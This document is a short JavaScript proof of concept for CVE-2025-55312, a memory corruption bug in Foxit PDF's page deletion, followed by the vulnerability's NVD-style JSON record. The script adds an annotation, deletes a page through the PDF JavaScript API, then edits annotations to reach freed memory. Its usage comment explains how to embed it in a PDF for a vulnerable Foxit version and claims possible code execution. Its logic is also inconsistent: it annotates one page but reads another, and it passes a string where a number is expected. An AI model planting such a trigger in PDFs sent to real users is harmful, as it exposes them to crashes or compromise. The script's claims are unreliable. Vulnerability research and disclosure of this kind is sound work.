CVE-2025-55312

// CVE-2025-55312 PoC - Foxit PDF Memory Corruption // This PoC demonstrates the vulnerability in Foxit PDF's JavaScript page deletion function triggerCVE202555312() { try { // Step 1: Get the current PDF document var doc = this; var pageCount = doc.numPages; // Step 2: Create annotations on the page to be deleted if (pageCount > 1) { var pageToDelete = pageCount - 1; this.addAnnot({ type: "Text", page: pageToDelete, contents: "Malicious annotation", rect: [100, 100, 200, 200] }); // Step 3: Delete the page via JavaScript // This triggers the vulnerability - internal state not properly updated this.deletePages({ nPages: pageToDelete.toString() }); // Step 4: Immediately trigger annotation operations // The application will dereference invalid/released memory var annots = this.getAnnots({ nPage: 0 }); // Step 5: Access deleted annotation to trigger crash if (annots && annots.length > 0) { annots[0].contents = "Modified after deletion"; } console.println("PoC executed - vulnerability triggered"); } } catch(e) { console.println("Error: " + e.message); } } // Execute the PoC triggerCVE202555312(); /* Usage: 1. Save this JavaScript code in a .js file 2. Create a PDF with at least 2 pages 3. Add this JavaScript to the PDF document properties 4. Open with vulnerable Foxit PDF version 5. The application should crash or allow code execution */

{"cve": {"id": "CVE-2025-55312", "sourceIdentifier": "[email protected]", "published": "2025-12-11T16:16:25.613", "lastModified": "2025-12-18T21:34:22.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Foxit PDF and Editor for Windows before 13.2 and 2025 before 2025.2. When pages in a PDF are deleted via JavaScript, the application may fail to properly update internal states. Subsequent annotation management operations assume these states are valid, causing dereference of invalid or released memory. This can lead to memory corruption, application crashes, and potentially allow an attacker to execute arbitrary code."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.1.7.63027", "matchCriteriaId": "D4EDFD47-2811-431C-8535-91EE4090A9A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.1.0.55583", "versionEndIncluding": "2023.3.0.63083", "matchCriteriaId": "D8785CCE-C44C-4908-9133-13A580D5BECB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.1.0.63682", "versionEndIncluding": "2024.4.1.66479", "matchCriteriaId": "CF043D20-0E28-481C-8756-D1301FAE67D2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:2025.1.0.66692:*:*:*:*:*:*:*", "matchCriteriaId": "E0FF839F-37E7-4AFA-85B1-FC98366B14E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025.1.0.66692", "matchCriteriaId": "6520861F-4458-4E63-AA62-CF3096AE0C41"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.1.0.15510", "versionEndIncluding": "2023.3.0.23028", "matchCriteriaId": "0C75FEE6-54F3-49C6-BAEA-A09D23BE5D64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.1.0.23997", "versionEndIncluding": "2024.4.1.27687", "matchCriteriaId": "2C06BC41-9831-4AE3-B10B-3FC313D01580"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:2025.1.0.27937:*:*:*:*:*:*:*", "matchCriteriaId": "9FDC914F-B999-4233-8BEA-CA20B1F0D9D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025.1.0.27937", "matchCriteriaId": "DB827B5A-9957-43B2-A633-EF5442A2EF35"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.foxit.com/support/security-bulletins.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}